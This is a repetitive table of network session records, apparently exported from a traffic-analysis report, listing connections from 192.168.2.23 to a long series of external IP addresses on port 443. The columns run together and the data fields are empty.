                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23018192.168.2.2332954201.17.50.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23019192.168.2.233576224.245.207.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23020192.168.2.234043039.43.183.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23021192.168.2.2357198146.213.96.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23022192.168.2.236094220.243.152.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23023192.168.2.2358096182.175.251.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23024192.168.2.235714858.230.102.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23025192.168.2.2360736119.5.87.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23026192.168.2.2357430186.14.219.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23027192.168.2.2352964129.140.21.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23028192.168.2.2348160111.146.73.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23029192.168.2.234918292.12.117.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23030192.168.2.233439487.189.87.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23031192.168.2.235597627.133.241.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23032192.168.2.234291845.147.69.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23033192.168.2.2334168135.16.252.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23034192.168.2.2336312200.66.91.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23035192.168.2.2354774162.133.184.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23036192.168.2.233536843.228.20.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23037192.168.2.2341102136.209.129.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23038192.168.2.234646093.55.243.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23039192.168.2.2348780118.189.133.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23040192.168.2.2346060202.6.133.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23041192.168.2.2344910196.79.83.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23042192.168.2.2340984189.88.31.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23043192.168.2.234849495.177.241.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23044192.168.2.2349832130.141.143.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23045192.168.2.2342658154.1.145.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23046192.168.2.2357098169.72.71.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23047192.168.2.2356068116.111.74.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23048192.168.2.234305650.14.234.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23049192.168.2.234631035.149.126.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23050192.168.2.235207638.102.7.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23051192.168.2.23527001.126.66.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23052192.168.2.235064074.250.75.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23053192.168.2.2354350221.18.47.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23054192.168.2.2341534119.105.19.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23055192.168.2.2345204144.184.173.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23056192.168.2.2340366122.210.82.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23057192.168.2.235385243.193.13.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23058192.168.2.23400342.221.161.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23059192.168.2.2344210101.196.248.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23060192.168.2.234846664.8.228.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23061192.168.2.2360608209.70.58.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23062192.168.2.2357426209.135.37.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23063192.168.2.2355656167.108.14.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23064192.168.2.2350890120.31.174.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23065192.168.2.2333828152.174.197.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23066192.168.2.2344158180.12.236.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23067192.168.2.2342192219.204.243.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23068192.168.2.2351852135.104.182.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23069192.168.2.2342796138.195.79.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23070192.168.2.2339116141.221.176.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23071192.168.2.2359208148.93.5.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23072192.168.2.2336764208.177.75.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23073192.168.2.233918638.175.29.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23074192.168.2.2350222106.238.42.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23075192.168.2.2358606176.160.236.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23076192.168.2.2335350154.137.49.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23077192.168.2.234951250.97.229.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23078192.168.2.2341384118.204.128.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23079192.168.2.2355996103.5.74.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23080192.168.2.233464041.72.31.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23081192.168.2.233826654.207.3.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23082192.168.2.2336260173.187.40.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23083192.168.2.2340582131.168.111.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23084192.168.2.234159462.238.192.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23085192.168.2.233852414.108.241.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23086192.168.2.2356676112.18.227.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23087192.168.2.2339880114.99.80.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23088192.168.2.2358726208.187.119.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23089192.168.2.235413244.126.34.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23090192.168.2.2341514120.46.144.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23091192.168.2.233813683.157.175.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23092192.168.2.2339268140.117.0.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23093192.168.2.2337324142.23.45.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23094192.168.2.23370608.220.66.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23095192.168.2.233826080.196.196.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23096192.168.2.2357138144.76.92.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23097192.168.2.2347314179.103.209.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23098192.168.2.2344972106.93.234.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23099192.168.2.234758288.153.158.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23100192.168.2.2357762210.155.13.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23101192.168.2.234339691.1.46.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23102192.168.2.234948236.234.139.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23103192.168.2.234181275.218.206.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23104192.168.2.235582672.74.148.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23105192.168.2.2336050132.59.186.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23106192.168.2.2332824223.5.186.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23107192.168.2.2341916148.61.206.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23108192.168.2.2345656129.60.105.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23109192.168.2.233807486.244.63.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23110192.168.2.235726479.42.150.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23111192.168.2.2358370192.192.35.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23112192.168.2.2342324201.88.100.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23113192.168.2.233379634.134.99.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23114192.168.2.2343998112.230.9.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23115192.168.2.234557643.243.244.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23116192.168.2.2339112202.147.56.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23117192.168.2.2344304157.96.31.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23118192.168.2.2360584106.138.53.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23119192.168.2.2344422181.71.229.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23120192.168.2.2349026164.191.237.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23121192.168.2.2355960199.57.25.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23122192.168.2.235948249.17.40.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23123192.168.2.2344084112.11.15.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23124192.168.2.235629441.99.252.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23125192.168.2.2346566172.192.103.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23126192.168.2.2348740211.17.2.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23127192.168.2.233884036.46.119.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23128192.168.2.235711681.111.227.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23129192.168.2.234878468.47.13.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23130192.168.2.2342360196.232.154.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23131192.168.2.234459292.145.237.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23132192.168.2.2359274118.33.243.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23133192.168.2.2348722174.78.188.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23134192.168.2.234470442.248.113.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23135192.168.2.2344526118.249.91.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23136192.168.2.2337698146.194.27.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23137192.168.2.234477253.212.144.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23138192.168.2.233484476.128.48.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23139192.168.2.2350840218.23.152.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23140192.168.2.2344038213.46.247.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23141192.168.2.2334420193.205.248.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23142192.168.2.2336616130.44.232.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23143192.168.2.235392041.111.91.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23144192.168.2.2347922184.78.6.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23145192.168.2.2346488173.32.144.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23146192.168.2.235505880.207.85.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23147192.168.2.235117298.246.238.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23148192.168.2.234451013.205.197.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23149192.168.2.233924295.12.141.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23150192.168.2.235079865.18.168.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23151192.168.2.2341848178.54.26.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23152192.168.2.2350124219.226.255.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23153192.168.2.2359030187.234.227.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23154192.168.2.2357612147.152.37.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23155192.168.2.234941892.108.82.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23156192.168.2.235296659.180.59.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23157192.168.2.2336154101.191.228.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23158192.168.2.233640874.115.84.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23159192.168.2.234092067.91.17.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23160192.168.2.235141884.207.62.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23161192.168.2.2344048182.154.138.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23162192.168.2.235216284.138.55.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23163192.168.2.23585108.95.98.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23164192.168.2.234301052.14.217.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23165192.168.2.235250236.190.87.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23166192.168.2.2348256132.142.217.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23167192.168.2.2344472146.111.30.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23168192.168.2.233406254.3.28.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23169192.168.2.2357422136.86.95.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23170192.168.2.233390260.145.14.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23171192.168.2.2359038140.253.253.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23172192.168.2.2341402103.192.71.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23173192.168.2.2349758119.111.174.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23174192.168.2.2342772153.152.114.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23175192.168.2.234183437.28.125.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23176192.168.2.2355442166.249.215.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23177192.168.2.2333974222.26.188.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23178192.168.2.2348102144.191.205.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23179192.168.2.236039895.51.165.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23180192.168.2.235170693.155.220.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23181192.168.2.235352477.135.183.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23182192.168.2.2350192130.76.25.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23183192.168.2.2344142217.125.252.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23184192.168.2.2349666154.166.7.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23185192.168.2.2348730184.17.68.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23186192.168.2.2340866125.39.42.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23187192.168.2.2350224168.215.25.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23188192.168.2.2335496182.69.159.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23189192.168.2.235816847.174.203.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23190192.168.2.233677234.157.49.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23191192.168.2.235665668.183.31.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23192192.168.2.2350146195.0.68.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23193192.168.2.2360554180.7.104.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23194192.168.2.234573853.49.87.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23195192.168.2.2358074114.147.198.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23196192.168.2.2333462134.144.24.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23197192.168.2.2342446179.141.144.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23198192.168.2.2343930157.196.76.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23199192.168.2.2332804183.26.251.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23200192.168.2.235324875.121.125.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23201192.168.2.234803286.131.214.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23202192.168.2.2356040189.72.110.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23203192.168.2.2336220166.226.124.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23204192.168.2.235935066.89.212.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23205192.168.2.235319234.50.224.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23206192.168.2.2340688183.255.246.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23207192.168.2.2343110169.162.158.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23208192.168.2.234641066.11.252.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23209192.168.2.2356662216.68.176.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23210192.168.2.2344080201.249.95.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23211192.168.2.2340516204.102.206.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23212192.168.2.2344110209.167.74.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23213192.168.2.2358576138.9.119.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23214192.168.2.2337202173.50.117.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23215192.168.2.235906663.137.247.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23216192.168.2.2351294108.187.142.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23217192.168.2.2356204210.205.27.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23218192.168.2.2335660149.161.21.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23219192.168.2.234406476.38.139.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23220192.168.2.2345250109.109.249.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23221192.168.2.2351052218.117.239.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23222192.168.2.2359572221.198.216.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23223192.168.2.235248240.0.88.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23224192.168.2.23589701.178.75.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23225192.168.2.236037820.125.126.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23226192.168.2.234690646.197.97.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23227192.168.2.2341818204.9.34.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23228192.168.2.2338092161.223.90.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23229192.168.2.2359420118.63.110.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23230192.168.2.2336368165.251.204.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23231192.168.2.2338458183.23.75.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23232192.168.2.2349080186.225.174.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23233192.168.2.2343130223.85.84.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23234192.168.2.2336202151.124.55.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23235192.168.2.2341310151.6.4.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23236192.168.2.2343682205.156.255.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23237192.168.2.2353380150.231.51.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23238192.168.2.2336338142.114.97.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23239192.168.2.233963832.130.139.244443
